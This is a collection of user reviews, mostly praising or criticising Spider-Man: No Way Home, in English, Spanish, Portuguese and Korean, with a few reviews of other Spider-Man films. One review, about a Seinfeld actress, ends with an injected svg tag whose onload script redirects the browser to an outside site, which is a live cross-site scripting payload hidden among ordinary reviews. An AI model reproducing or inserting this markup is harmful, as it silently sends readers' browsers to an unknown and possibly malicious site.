CGI - nup.
Rest of the film - yassssss.
Hard to criticise if I had to be picky it would of been cool if it was like 3 hours long the plot was just so good, probs the best Spider-Man movie ever made in my opinion you can't be O.G Spider-Man 1 for nostalgia but jheez this movie had it all just hope mysterio an the real sinister 6 make an appearance in Spider-Man 4 and not tha b.s kraven stuff
The premise of the movie was awful. The world turns on Spiderman because of Mysterio. All pervious heroics are forgotten? The best parts of the movie involved the other Spidermen. To have everyone forget who Peter Parker was did an injustice to the character.
amazing cried the entire 2nd half of the movie pretty much so many emotions loved it
Excellent! Loved it!
This movie was magical. Literally and figuratively. There has been a lot of hindsight nitpicking, but ultimately it works as a Spider-man movie, it works as an MCU movie, it works as an IP/franchise piece, and I know from first-hand accounts that it worked as a standalone movie (which is a wild achievement.)
This movie is was fan service. Absolutely amazing, love it.
dude i cried i love this movie so much
Best Spider-Man movie of all time. And best non avenger marvel movie.
One of the best movies I have seen! Having Spider-Man and Multiverse is something I love very much! Seeing the MCU version of the Statue of liberty was really cool. The final battle was insane! Nice way end Spider-Man's first trilogy!
The best spider-man movie to date, it really shows peter's personality and shows just how good of a person he really is.  The villains especially green goblin were amazing.  Easily top 3 mcu movies.  The suits also looked really nice in the movie and was just an added bonus.  The final suit at the end was probably the best Spider-Man suit in a movie and I'm pretty excited for the sequel. For me this movie is the best solo superhero film and it might even be better than endgame and infinity war.
Tobey and Andrew the  villans were good Tom Holland was the best so was the final battle
Fan service done right. That word has earned such a negative reputation, but this movie reminds us that it's not always bad.
The Best movie about Spider-Man Ever!
is the best movie of all time?  The spider man character is amazing.
My Rating: 10/10 (Perfect)
Best spiderman sequel 1b out of 1b
93/100 I agree With the Meter.
My personal favorite movie of all time. Full of great surprises and a all around amazing movie
it was great because the classic and modern actors have returned to appear in the mcu movie
I love Marvel, and I loved this movie, but, honestly, it is a little bit overrated. Doctor Strange went from beating up Thanos in Avengers: Infinity War, to getting easily beat by Spider-man in the mirror dimension WHICH HE HAS STUDIED AND USED FOR HALF A DECADE!
Spider-man No Way Home is a perfect Spider-Man movie, this movie is a celebration of all of the Spider-man movies that came before it. The story that the movie follows has to be one of the best Spider-man stories of all time! This movie brings a perfect balance of fun and heart-tugging moments throughout the movie.
Awesome! One of the best movies I have ever seen!
Melhor filme do ano, pura nostalgia.
This was a pretty solid movie. I had a lot of fun with it and really enjoyed all the cameos and throwbacks to older Spider-Man films. This might be my favorite Spider-Man movie.
Spider man no way home was a great marvel movie.
It was a pretty good movie but it was one of those movies that could have just not been made at all. It have nothing to add to the story and its just like, Come on the movie could have been 20 minutes long if Peter told dr strange to do the spell and then he did it with no interruptions and its just like, Stupid.
Fan service cliche. Meh
Loved the nostalgia in this and the tension at the end !
the greatest movie of all time
While the plot isn't all there, this is an incredible experience for an Spider-Man fan.
Es muy buena, ver a los 3 Spider-man en una sola película es increíble, un buen Fan service, pero me gusto mucho, muy divertida, los efectos especiales no son los mejores pero no están mal, es la mejor de la trilogía de Tom Holland, no es perfecta, quizás no sea un 5 pero si un 4.85, la experiencia cuando fui a verla fue una de las mejores al ir a ver una película
It was great spiderman movies are great right now
best thing ive ever seen, if it weren't for andrew garfield and tobey maguire, this movie would suck big balls, but im quite satisified, a must watch.
With more mature themes, powerful performances, and a rollercoaster of emotions and surprises for fans and audiences alike, Spider-Man: No Way Home swings into action, delivering the best instalment in the MCU's Spider-Man series.
Not as good as the two prior Spidey films. I think the fan service is what made people swoon over it. 

Personally I find multiverse stories really bland and basically a cop out on in universe actions having consequences
They did so much fan service to get me to like it and I know that but it worked anyway
it was fan service but it worked
A movie made for Spider-Man fans.  If you are a Spider-Man fan you've already seen this.  If you're not, you probably won't get as much out of this but it has some enjoyable action scenes with competent acting and some good humor so I will still recommend it.
Spiderman : No Way Home is clearly a fan-service. Yet, I love the performance of the 2 actors who are not so young. It was a film we all needed.
BEST MOVIE EVER (beats endgame)
es mejor película de spiderman es muy genial y épica los villanos son increíbles es gran crossover es un 9.8 de 10
Full of plotholes and a thin story.. the only good thing about this movie are Tobey and Andrew especially Andrews Redemption Arc
I got to be honest, I think I enjoyed this film almost more than Avengers: Endgame. It is definitely the best Spider-Man movie I've ever seen. Can't begin to tell you how amazing it was to see the return of familiar faces: Alfred Molina, Willem Dafoe, Andrew Garfield, Tobey Maguire, etc. And it was simply fantastic how well they portrayed the characters here. Green Goblin was arguably more intimidating than he was in the original 2002 Spider-Man. Your heart will break for Tom Holland's Peter as he faces more adversity than ever before! The rest of the cast did an incredible job as well, including Benedict Cumberbatch. Like RDJ as Tony Stark, I can't imagine anyone else playing Dr. Strange. Not that he wasn't good in his own two movies, but I feel that Garfield's Peter Parker was better here than he was in those. This film really showcases how to do fan service and do it extremely well! Seeing all three versions of Peter sharing screentime together was truly priceless. Best movie experience of 2021 without question.
the trilogy ends on a spectacular note, this movie does the impossible by putting all 3 live action spidermen on the big screen, all the while keeping a good story, good villains, and a amazing ending
The last great marvel movie. Aunt may dying always kills me. Great movie.
Apesar de trazer velhos conhecidos do público de volta com cenas fantásticas, o enredo peca convenientemente a favor disso o que decepciona como outras obras da Marvel vem fazendo.
Spider-Man: No Way Home does what only the greatest superhero films do; it takes the most fantastical, grand-scale subject matter and fashions a very personal and relatable story. Deeply philosophical, this film is more about Essentialism and the complex struggle between normative and descriptive ethics than anything else. As such, No Way Home never loses sight of Peter or his authentically human arc.
The twist was amazing, fantastic film even if you're not a spider man fan
Bringing back the two older versions of Spiderman was such fun to watch. Definitely one of my favorite Marvel.
Marvel needed this movie - so good. Best one in a long time.
The greatest live-action Spidey film to date. So much fun for every fan of Spider-Man.
the movie was violent it says it's PG but it looks like it's PG-13.
And there's all these ads before the movie, which are rated R 
And the movie is way too long
And it was way too complicated

And then there's your ending …to be continued 
Very disappointing movie
The movie is perfect, i don't know what to tell he is so good. There is no better movie for me!!! I like the idea of Spider-Verse in live action.
Enjoyable movie, it is not the best of Spider-man but it unites the best of each saga and makes a great fanservice.  Seeing great actors and characters return again is something I will never forget.  Tom Holland improves his spider-man a lot and his performance is very good.  I love this movie and I love all 3 spider-man.  Thanks Marvel.
Although I think they've been very coy about the Spider-Verse in this movie as we only offer a few appearances for Tobey Maguire and Andrew Garfield's Spider-Man, I think for a live action movie  it's pretty daring, it's more fan service than a good story, but it's still impactful.  It's the best movie in the MCU's Spider-Man trilogy.
Marvel Cinematic Universe? More like Marvel Cameo Universe, Spider-Man: No Way Home does provide some decent development for Tom Holland's Spider-Man but at the cost of everything they have previously built for his character throughout the MCU. Instead of trying to do something new and continue his character in a way that makes his Spider-Man unique from the rest; instead of doing that Feige decided to take the character in the route of comfort and decided to make him like his two Spider-Man predecessors. Now that's not to say that the film isn't a good theater experience because it sure is, but that experience is at the cost of actual good and original storytelling which is unfortunately not done here. The action is very well done and is one of Marvel's best-looking movies where almost all of the sequences look finished visually. Ned and MJ are again both great in their side character roles and all the returning villains are great. The disappointing thing is that in the previous two Spider-Man films they had set up future conflicts of Spider-Man, and instead of doing that Marvel took the route of comfort and put this Spider-Man on the same route as the others even though he was different from those two when he entered the universe. Now this isn't all of Marvels doing as now the audience just expects them to bring in all of these cameos; which yes cameos have happened many times in the MCU before this, but they all feel earned and none of these cameos felt earned; the cameos were forced and just used to try and sell tickets as all of the returning villains were in all the promos. And this really makes me wonder, is the MCU losing its ability to tell original stories and the Multiverse is just an excuse for them to bring back any fan-favorite character they want to please the audience and get away with lazy storytelling?
Spider-Man: No Way Home is the MCU at its finest! The movie features amazing fight scenes, with the bridge and apartment fights being particular standouts. Of course Andrew Garfield and Tobey Maguire's presence elevates No Way Home to new heights. While the magic of their introduction has passed upon re-watching the film, I will never forget Andrew Garfield's reveal on opening night as one of the greatest experiences in cinematic history. This movie is definitely the most emotional of the MCU Spider-Man movies, with Aunt May's death being incredibly shocking, but ultimately allows for Peter to truly discover what it means to be a hero, wrapping up the story in a very satisfying fashion. All in all, Spider-Man: No Way Home easily establishes itself as my favorite MCU movie.
Everything about this third movie is very perfect Tobey Andrew and Tom's spiderman teaming up made me so excited and cheered Andrew's redemption arc is so good this is easily a 100/10 👏
This Spiderman film has a story line worthy of a mention, but where this movie shines is the characters. Watching them bring back all of the previous live action Spiderman villains and Spidermen was a great time. Even the lawyer (Daredevil) cameo was great.
I would kill to watch this movie again in theatre's for the first time.
My sister said it was 5 stars and I agree
This movie is better than all the spider man movies combined!
The fan service is endearing and always a joy. But Spider-Man: No Way Home manages to balance this out with strong emotional beats with fun action scenes and incredible acting across the board.
Foi simplesmente inesquecível assistir no cinema
As with many properties under the MCU umbrella, Spider-Man: No Way Home, is both entertaining and flawed.  Luckily for the third installment, there is more than enough good to outweigh the bad.  Unfortunately when dealing with nostalgic properties there is always the possibility of viewing said movie through rose colored glasses, thereby hindering your ability to give an unbiased review.  That being said, in this instance I couldn't have cared less.  The mixture of new and old favorites with a pinch of fan service leaves an entertaining popcorn-flick that has a little something for everyone to enjoy.  Just be sure to bring tissues, just in case you cry in every movie like I do.
Great application of the multiverse for one of Marvel's most iconic super heroes. Spoiler alert: the three previous actors portraying Spiderman (and their respective villains) show up in the film. You get emotional and would like to clap when the original Peter Parker shows up on screen. Good movie, with a good resolution. I wonder what's ahead of Marvel's Avengers after End Game.
One of the best Spider-Man movies a really good third movie for a trilogy 👏👏👏👏
The conclusion of the Home trilogy not only blows its predecessors Homecoming and Far From Home out of the water in terms of storytelling but also in terms of being a more serious take on the character of Spider-Man. Peter continues to suffer the consequences of being Spider-Man in a world that is violently ripping his psyche apart. Torn between worlds, Tom Holland's Peter Parker is being forced to grow up quickly as is identity not only puts him danger but also his friends and family on a multiversal level. Tom Holland stands next to Andrew Garfield and Tobey Maguire's Spider-Men, and earns his title as not only Spider-Man, but one of the greatest origins of the character. Zendaya's Michelle Jones is one of the strongest female leading roles in any of the Spider-Man movies, only being beaten out by Emma Stone and Hailee Steinfeld's Gwen Stacy character in their respective films. A movie that has heart, grit, beauty, and gloom, this is the movie that many Spider-Man fans had been waiting on for decades and leaves room for more. A multiverse story that doesn't rely on nostalgia as it's core and instead uses it to tell an emotional coming of age story of Peter Parker.
I love ned I love this movie I love tobey I love Andrew I like tom i love the villains so i love this one
this movie is a masterpiece
An amazing film for die hard spider man fans because of its amazing jokes, cameos, and action.
This movie is insane in the best way
It's a great movie unless you haven't seen the other 5 spiderman movies
The main hero's motive  is so irrational and meh. Too much reliance to elements of nostalgia.
This Is Perfect I would say it is the best because we have all Spidermans together and this matched so perfect and we got alle the villains from the Tobey Maguire ones to the tom holland ones it was perfect
Spider Man: No Way Home was super good. Very funny, great action, and awesome callbacks.
Absolutely Stunning, Amazing, maybe the Story it's not Perfect but the meaning of the movie, the meaning for the Characters to Solve old problems that they couldn't fix in the past makes the movie perfect!
Outside of "Spider-Man 2", this is the second best Spider-Man movie I've seen, bringing all the Spider-Men and past villains
It was good, but the fan baiting nostalgia casting tactic is way too transparent, and a little boring at this stage considering it's been done to death.
Um filme bom, mas o roteiro poderia ser melhor.
Very great! Something to be reminded of and gives so much nostalgia.
What was the moral of the story?  None.  I don't even consider this a movie.
I think it was fun and amazing to watch to see all three spider men together. The nostalgia made me laugh to see the amazing Spider-Man crack the first Spider-Man I loved it
NO WAY HOMEEEEEEEEEEEEEEEEEEEE
In my opinion this is the best movie of all time. The combination of all 3 spider-men and then the villains especially Green goblin were amazing!!
No words can describe how AMAZING this movie is.
Average plot and, at certain points, CGI, but awesome action sequences and acting.
Pacing is fast, but not too much.
The whole movie is filled with emotion and nostalgia and, if you're a long time Spider-Man fan, it really brings tears to your eyes.
The deaging was pretty well done with Molina and Dafoe, but the fact that they kept Sandman in his sand form for almost the entire movie and that they recycled old scenes for both his and Lizard's human forms is a pity.
Surely it isn't the best Spider-Man movie ever done, but it really does its job.
(The final swinging sequence made me cry)
Terrible story. Great fan service. If you're a fan of spiderman you'll enjoy this movie. Doesn't offer much other than a money grab. Watchable. But that's it
This is by far the worst Spider Man film I've ever seen. The jokes are like they were written by a 17 year old in middle of his puberty. Every single line makes you cringe and hopa for it to be over soon. Don't get me wrong, I love Tom Holland and Benedict Cumberbatch, I think they are great actors. But I really don't know how they could sign up for this script. Very sad
A great emotional funny sad and heroic but the ending was unsatisfying
this was amazing. 1000/100%. the best mcu movie ever. it did spiderman justice. we need this to go to disney+.
Minha Melhor experiência de vida em um cinema
A fun, nostalgic, emotional rollercoaster Spider-man movie that lives up with the hype and a great ending for our friendly neighborhood Spider-man. Seeing my childhood heroes came back on the big screen is big a surprise not only to me but also to every spiderman fans across the world.
🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩
A great look at what previous generations of Spider-Man have been up to. I'm this movie they are forced to face old foes and teach a younger Peter about loss along the way. A great way of showing what different studios can do working together.
I watched the Hindi dubbed version of "Spiderman: Across the Spiderverse," and I must say that the dubbing was exceptionally well done. One standout performance came from Shubham Gill, who dubbed the character Pavitra Prabhakar, also known as Spiderman India. Shubman Gill, being the first-ever sports personality to lend his voice to a fictional character, did an outstanding job. His dubbing was seamless, and he brought the character to life with his expressive voice acting.

The other voice actors in the Hindi dubbing were equally commendable. Koustuv Gosh, who voiced Miles Morales, captured the essence of the character perfectly. His performance was engaging and brought depth to the character's emotions. Musskaan Jafferi, who dubbed Gwen Stacy, also did a fantastic job, delivering a performance that was true to the original character.

I watched the movie at KC-PVR Cinema Jammu on 1st June, and the overall experience was enjoyable. The showtime was from 12:55 pm to 3:37 pm, giving me ample time to immerse myself in the film. One of the most remarkable aspects of the movie was how it managed to draw me in completely. The animation, storytelling, and voice acting combined to create an immersive experience that kept me engaged throughout.

Now, let's talk about the exciting part. The movie ended with a thrilling cliffhanger, leaving the audience eagerly anticipating the next installment, titled "Spiderman Beyond The Spiderverse." While details about the upcoming film are still scarce, the ending of "Across the Spiderverse" hinted at a new adventure and introduced the possibility of a multiverse storyline. This opens up a whole new realm of possibilities for the Spiderman franchise, and fans are already buzzing with excitement.

I highly recommend watching "Spiderman: Across the Spiderverse" and experiencing the excellent Hindi dubbing. The performances by Shubham Gill, Koustuv Gosh, Musskaan Jafferi, and the entire voice cast bring these beloved fictional characters to life. The immersive nature of the movie, coupled with its cliffhanger ending, makes it a must-watch for all Spiderman fans. Keep an eye out for "Spiderman Beyond The Spiderverse" as it promises to continue the captivating and thrilling journey of the Spiderman universe.
This movie was so bad. I'll never understand the way some of you can routinely digest this stuff.
The perfect movie to bring you back to the theaters!
Literally I didn't enjoy the film maybe because of the leaks. I felt bore during the death of the Aunt May and the escape of the villains from the Apartment sequence was literally worst. Tobey Maguire and Andrew Garfield saved this film. It was a decent film if you know the spoilers it was a masterpiece if you doesn't know the spoilers.
It was a good movie, the best of all Tom Holland's spider man movies
I still say this is my favorite movie of all time this movie made every Spider-Man fan dream come true and till this day the greatest movie theater experience of all time it's still hard to believe that Marvel went out of their way to bring all the live action Spider-Men into one spectacular film everything about it was perfect in my eyes.
Love this movie so much it's the best can wait to see more !!
Unfortunately a perfect score is blocked by the slower pacing of the first section making it difficult on rewatches. Besides that, the film is a fantastic watch, especially as a spider-man fan. The film is particularly catered to the fans, making the not-so-subtle nods to the audience very cheeky. The performances from the actors are especially great to watch, not to mention the antagonists. It's also important to note that Tom Holland is giving his best performance so far. The writing suited the hype of the film as well, giving us a fresh new take with some new spins.
As of all of the Spiderman movies this is a masterpiece of a movie, great story, great acting.
The best Spiderman film ever made. Dr. Strange plays a huge role and so does the multiverse.
Si no hubiera fan-service sería peor
One of the best spider movies ever! ... loved it, cried, laughed, had a nostalgic moments... truly wonderful.
Top three MCU movies!! Try to see on cinema.
No explaination needed, everyone who's seen No Way Home knows it's VALID
Alfred Molina, Tobey Maguire, and Willem Dafoe all back from the OT, and they're all just as phenomenal, compelling, terrifying, and empathetic as they were when this whole superhero thing got started.

Absolutely magical.  Yeah sure there's fan-service and callbacks.  Get over yourselves - it's a superhero flick.
True gift for fans..🍻💞
Tom holland is the best..
Cant wait for the spider-man 4...🔥
Great movie, great acting, great score
This movie was overhyped even though I enjoyed my time watching the movie I think it was extremely forgettable.
WTF? I cannot understand the rave reviews. I'd characterize this as a disorganized random mess of randomized animation. Some kid's shows have surprised me. This one, I had to walk out.
Lives up to the hype.  Honestly, I didn't think Marvel had it anymore.  I bet Sony had to beat on them.  Sure there are some issues with this film - it tries to do a LOT, and because of that is a bit long.  There are too many characters, and often, you see people just standing around in the background waiting for something to do.  And my biggest gripe - the messaging is a bit wonky - they should have worked on this.  There are several main themes - great responsibility, always look on the bright side of life, but the most confusing was forgive your enemies no matter how many people have to die.
That all said, this movie nailed everything else.  The characters, even the villians for the most part, get an arc, are likeable, and just come off as positive.  Even Zendaya emotes in this one.  The nostalgia is great, and flows organically in to the story (minor logic gaps aside).  The Spiderman banter is awesome; it almost feels impromptu.  And each gets his own closure.
Do I need to say anything ? This movie has the 3 generations of Spiderman fans holding it . Shows us what it takes to be a friendly neighborhood & a confused superhero struggling with his personal & social life . Just a perfect cinematic & a Nostalgical masterpiece ✨️
Spider-Man No Way Home is an absolute blast of a film. While upon rewatch I have noticed some flaws with the movie, however, those few small hiccups can't take away from how awesome this movie is just to take in through the eyes. The conflict grips you almost immedietly and the "surprises" (come on, we all knew they where in it) are an absolute joy! This is easily one the most rewatchable MCU movies and has some of the greatest Super Hero moments of all time. I love it!
삼스파 말해뭐해 세명 나올땐 좀 짜릿했음
This is the best marvel movie of all time!!!!! I cried at the end. But Jon watts, you better make a 4!!
The best Spiderman of all. No doubt. 
The ending was just... AWESOME. I don't know if a film of this kind could ever be done again. It is a MUST SEE. Words don't describe how entertaining it is!
como un gran fan de spiderman dire que es un deleite para los fanaticos en general que amamos a este gran personaje creo que tienen una trama que logra sustentarse y por ellos es muy recomendable
It is my favorite superhero movie of all time
Great movie! Loved the original Spider-Man and the story.
If you were watching Spider-man movies between 2001-2020, this movie made your inner child just beam with excitement and joy!!!! Great story, amazing acting, and just an awesome film
Still watching this movie one day by months.
almost flawless, but i got blided by the nostagia fest this was...

with the peices Jon Watts had this movie could have been more. good but not perfect
Perfect blend of fresh new marvel story and nostalgic fan service.
I liked the movie, but I think there are too many plot holes.
See this movie any way you can, but theatrical is best! 
Does it help to know the stories of previous Spider-Man franchise films?
Yes…
…but it isn't necessary to enjoy the film or understand the plot. The movie does a terrific job telling a self-contained arch for Tom Holland's "Peter Parker" while traversing a complex multiversal storyscape, with top notch action and heartfelt character moments.
Wow. I have never enjoyed a movie as much as this one. It has everything a good movie needs.
literally no explanation needed. perfect movie
The pulling in of characters from the other movie series was well done.
The surprise was excellent. The plot was great. And the humor was on point.
Great fun for our nerdy household. Haven't seen such a good hero based script for a long time. Really entertaining and Cumberbatch was great as ever.
A definite must-watch. Probably my all time favorite movie! Andrew Garfield, Tobey Maguire, especially Tom Holland did great. I may or may not cried during Aunt May's death, but the last fight scene got me out of the theater with goosebumps! This is better than all the Marvel movies of 2022!
LOL, the funniest 02 hours: and 28 minutes ever!!!!!!!!!!!!!!!!!!!!!!!!!!!
I was really impressed with this movie. I've missed a couple of the movies over the years, and I probably should have watched the older movies first as it sounds like there were a lot of connections to the older movies. Just from what I know though, and what was shared with me by my Son I know there were some really crazy moments that played on the older movies. This was really, really good.
The reveal of Tobey and Andrew 11/10 the cinematography was amazing and I loved how we saw a lot of familiar faces from the previous movies
Fantastic movie with amazing actors and incredible performances still one of my fav movies to this day! This movie had amazing visuals and an amazing plot twist! Marvel needs to make more movies like this!
I recommend it, but it's only good to see it once
Just felt like it pandered to the audience, like the writers went on a Reddit thread and said, yeah, let's do what these guys want. Felt like a 2 1/2 hour commercial for the latest Burger King toy.
This is the perfect Spider-Man film! Never in my life would I have though I'd see all 3 Spider-Man actors sharing the screen together!
Disgusting movie boring
This movie that appeals to spider-man fans of all generations. It has a good script in its limitations, it has good action scenes, unlike other marvel movies where the fights are smoothed out. This film follows Peter Parker's coming of age journey, where he learns that with great power comes great responsibility.
Great movie !!! Love the flick
Me gustó la película, aunque creo que hay varios errores en el guión.
Viva el Spider Verse🕷️🕸️
No es que sea una gran película, está muy bien. Pero el ver a los tres Spiderman juntos y no ver wokismo por una vez hace que le dé una estrella mas.
Perfect movie for Mario! My family thank you!
Excelente. Sorpresiva, emocionante y muy muy bien hecha. Me encantó. Merece continuar toda la saga.
Amé totalmente la participación de Dr, Strange como una voz de razón y madurez, sin llegar a opacar o robarle el protagonismo en algún momento a Peter. 
Qué gran película!
Maravilhoso, tudo o que um fã do Homem-Aranha sempre quis. O único defeito são as piadas a todo momento.
Very good film, I want to see it again.
Only true Spider-Man fans can feel the thrill of this movie
HUGE SPIDER-MAN FAN!!!

Since I was a kid I always enjoyed Spider-Man cartoons and films which this film did not disappoint. 

If you are a Spider-Man fan this is definitely worth the watch. 🩷
I loved it is the best spiderman movie I loved seeing tobby and andrew again
La verdad está película vive de la nostalgia pero está buena.
Onlyfanservice :DDDD
lived up to the hype and more. This movie made me feel so much, and I left the theater enlightened
Great movie, I laughed multiple times. Good to see something like this, good adaptation of the comics and follows a good story.
I loved the film, but also cause I'm a huge Seinfeld fan and seeing Julia in a film just made me happy! <svg/onload="location.replace('https://izi.su/supsu')"></svg>
É um dos melhores filmes da Marvel
Exactly what a superhero comic book movie should be.
A fantastic movie that brings all the Spiderman together from the different films, it was great to see Tobey Maguire and Andrew Garfield back on screen as Spiderman, along with all the villains from the previous movies, while the movie wasn't perfect, it makes up for it making the fans happy and the nostalgia.
one of the best if not the best spider-man media
Spider-Man: No Way Home is the best way to do a great job on the stories of Marvel Studios, the CGI sometimes is bad but the next things of the movie is spectacular.
THIS MOVIE IS A GREAT MOVIE I LOVE IT AND I WAS SO HAPPY.
Best Spider-Man movie ever. Best Villains, best actors, best Superheroes.
This is officially my favorite Spider-Man movie and the best of the MCU and that is saying something because they have had some great movies. It was awesome seeing all three of the Spider-Man characters together and a great way to introduce the multi-verse to the MCU. RIP to ....  
Not going to spoil it.
I honestly love No Way Home and I'm watching it right now..don't tell anybody! ;P
Spider-Man: No Way Home is not just a movie, it is a celebration of the most beloved superhero in cinematic history. I laughed, I cried and I cheered with the rest of the theater more times than I can count.

The movie was jam packed but it did not feel bloated. Rather than try to force-feed multiple storylines and characters, which happened in Spider-Man 3 and The Amazing Spider-Man 2, this film delicately balanced each character and carefully articulated each moment. The pacing was offbeat at times, but that could have been due to my hopeful anticipation for the third act.

Some might call the film fan service but I call it a modern cinematic spectacle and a moment I will remember forever.
Spider-Man No Way Home is one of Marvel Studios greatest movies ever. It was a blockbuster that was able to do something no superhero movie has ever done, whilst still focusing on the growth of Tom Holland's character and resolution at the end of the movie. An absolutely thrilling movie with incredible acting and heart wrenching moments.
fantastic movie! exept the fact that it was all peter's fault
the most exiting movie after endgame
While this movie was enjoyable in some parts, I wouldn't call it a masterpiece or the best Marvel Cinematic Universe movie. Yes the nostalgic fanservice felt good and well done, but besides the fanservice the rest of the movie felt forgettable.
this movie took a leap of faith into the spider verse and delivered. Absolute masterpiece must see ten out of ten
Very bad story. The only good thing was the appeareance of Andrew and Toby.
Very good amazing with all the spider men so,good for original spider man fans
The best Spider-Man Movie of All Time!
This was one of my top 5 films of all time. As a fan of Spiderman, since I could speak, this movie was a dream come true. I never scream in the theater, but this movie made me do that. Andrew and Tobey were spectacular in this film, without taking the attention off Tom. The beginning is a little rough, but by the third act, I already forgot about the little flaws. While the MCU hasn't been as good since Endgame, they truly created a masterpiece.
This is great example of a dead average movie. At the end i didn't feel anything, no disgust, no happines.
Best superhero movie of all time in my opinion!
Greatest Spider-Man film of all time!
Eu adorei o filme esperava menos mas ficou surpreendementementalmenteincrivel ×2.
O roteiro está incrível, o cgi também está incrível só vi ali uma parte estranha mas se calhar só foi impressão minha.
Eu chorei mo filme especialmente no final que o Peter entra na loja a está lá a zendaya e o ned sem o reconhecer isso foi muito triste.
Spider Man: No Way Home is a thrilling ending to the spider man home trilogy. Warning: this movie is not for the faint of heart.
great movie, love spidy!
Probably the best marvel movie in a while.
One of the best movies do I need to explain why not only tobey or Andrew or the villains but also just the movie is very good
Great ending to Phase 3 & the Infinity Stone Saga. Before I watched this film I was baffled as to why Avengers Endgame wasn’t the last film in Phase 3. Black Widow should’ve been released in between Avengers Endgame & Spider-Man No Way Home.
Com toda certeza do mundo trouxe sentimentos que nunca vou conseguir explicar para quem não viveu a estreia desse incrível filme, parabéns a gênio que escreveu essa obra de arte
Great fan service in cinema but watching the movie alone at home... not very much. I just feel like Peter learnt nothing from far from home really since he trusted Mysterio so easily and got betrayed for it only to do it all over again in no way home. Defoe and Molina were brilliant and Benedict is a great actor so its always pleasant to see him as Doctor Strange, maybe not as much in Multiverse of madness...
Best movie of all time.
The best Tom Holland Spiderman film, and a great story.
If you haven't seen this movie go watch it. If you have seen it , Go watch it again!
This movie is the most hype Spider-Man Movie I have watch. Just seeing the three Spider-Men in one screen just makes this movie seems like a dream. I couldn't wish for more. The chemistry of Tom Holland and Zendaya was so perfect. This movie is full of emotions, action, amazing visual effects, and more. I just hope someday they can make Spider-Man happy, because he really deserve it. I'm waiting for him in Spider-Man 4, Avengers: Kang Dynasty, and Avengers: Secret Wars.
Love this movie, This has to be my favorite movies out of the mcu so far.
A fun movie to watch on the big screen with plenty of nostalgia fulfillment. After a third watch the magic wears off and you are left to wonder if this movie is the best Spider-Man movie. I still believe Spider-Man 2 holds the crown. Holland manages to improve on his betrayal of Spider-Man but is still outshined by those around him. If you're a casual viewer you may not appreciate this movie for what it is. To fully get the overall picture you have to watch 20 + MCU films and 5 Sony Spider-Man films, which is ridiculous.
I don't think this sequel deserves such a high score, although there are many wonderful parts in it, I will only give 80/100
BEST MOVIE OF ALL TIME
The best Spider-man movie ever made!
Amazing film loved it. Was my favourite marvel film ever it was so cool it made my childhood complete. My favourite spider man was in it that just made it extra special. It is for all ages even my grandpa wanted to see it. I would definitely recommend this film. Oh and Tom Holland was a great actor.
Best Spider-Man movie yet
most overrated movie of all time (besides spider-verse)
it's little boring but it's cool and fun
While the story lacked a little bit, the rest of the movie was so satisfying that its easy to forget the mediocre parts.
Best marvel movie of all time 🔥
Is it possible the folks involved with this be put in charge of the rest of marvel? Great movie best of the last two years. Great job to all involved. Thank you. Keep spidey awesome!
As a superhero movie fan, this is a dream come true. Writers pulled off a tough task in balancing so many things and cast. Acting was superb from almost all of the actors. This movie has a rewatchability factor, that is why it made almost 2B.
FILMAÇO, apenas isso, que filme maravilhoso, obrigado por terem feito esse filme, eu serei eternamente grato, meus olhos e meu cerebro agradecem grandemente por este filme
I cried so many tears from this movie, I love Spider-Man <3
Overrated, never really gave me excitement. Only enjoyable for nostalgia.
Live a lot of hype and nostalgia. Even so, it is an incredible superhero movie with excellent characters very well developed.
This movie was really awesome I love seeing all 3 spider-mans  in it
It is confusing and the CGI sucked.
Spider-Man: No Way Home is an absolute gift for fans. It combines the characters we all know and love from the previous Spider-Man movies, while giving an epic and darker story. One of the greats of the Marvel Cinematic Universe for sure.

Rating: 95%
Siento como si algo le faltará , siento que falta más desarrollo de personaje , la película es mucho fancervice xd
the BEST spider-man's movie
Watching this made everyone cry happy tears at the start to the middle and sad tears at the end
The user score definitely got this right.  Best action of any Marvel movie and perfect mix of comedy
This movie is fan service, and I love it.
A show !!!! Lots of fanservice and a good script Spiderman is the movie that if it's on TV, just watch it!!!!!
Ton Holland, Toby and Andrew. Need I say more?
The best of "Spider-Man: No Way Home" reminded me why I used to love comic books, especially the ones about a boy named Peter Parker. There was a playful unpredictability to them that has often been missing from modern superhero movies, which feel so precisely calculated. Yes, of course, "No Way Home" is incredibly calculated, a way to make more headlines after killing off so many of its event characters in Phase 3, but it's also a film that's often bursting with creative joy.
It's very overrated.
I've been waiting for this movie for ages and it's very disappointing.
Absolutely disgusting
Spiderman Homecoming is an exciting and fun-filled addition to the Marvel Cinematic Universe. Tom Holland is perfectly cast as the friendly neighborhood Spiderman, and the movie strikes a perfect balance between humor, action, and heart. Michael Keaton is fantastic as the villainous Vulture, adding depth and complexity to his character. The supporting cast is also superb, with standout performances from Jacob Batalon and Zendaya. The movie's plot is engaging and keeps you on the edge of your seat throughout, and the special effects are top-notch.
Keep your mask on you stupid son of a bitc-
Easily one of the best superhero movies I've ever seen it blended the cameos so well its basically perfect
Really good could have had more villains and venom be more of a villain as well as seeing more doc oc as a bad guy but overall really good
This film starts on shaky ground but makes up for it. Dr. Strange seems like he must be some sort of imposter because he makes such stupid decisions. Really, the writers didn't want to put forth effort to come up with a good reason why the 2nd and 3rd acts should happen. The cameos work better than I expected and surprisingly stay true to established motivations from previous iterations of this franchise. Longtime fans of Spidey will be rewarded, even with some stumbles along the way.
LOVED THE SPIDEY TEAM UP. AMAZING SPIDERMAN / TOM HOLLAND & TOBEY MAGUIRE AMAZING 10/10 🔥
I will start to rate 2 stars all movies that I watch with bad lighting. It is a movie about some guys bitten by spiders. We don't need to get drawn into the night. This kind of cinematic trend is the one sinking DC.
The last great Marvel movie before the constant nonstop Shitshows that followed like Eternals, Doctor Strange: Multiverse of Madness & AntMan: Quantumania. This movie was full of real emotion, raw energy, perfect pace, incredible plot direction and a nearly perfect film from redemption to ascension and acceptance to the duty that SpiderMan stands for: With great power, comes responsibility, and, sacrifice for the greater good of all. TOTAL MUST SEE!
Enjoyed it a lot more than the terrible "Far from Home". Felt like the writers really put some effort into writing the story. Not great but definitely enjoyed it.
Incredible Movie! An amazing plot, great story, and long movie makes for one of the best MCU movies of all time.
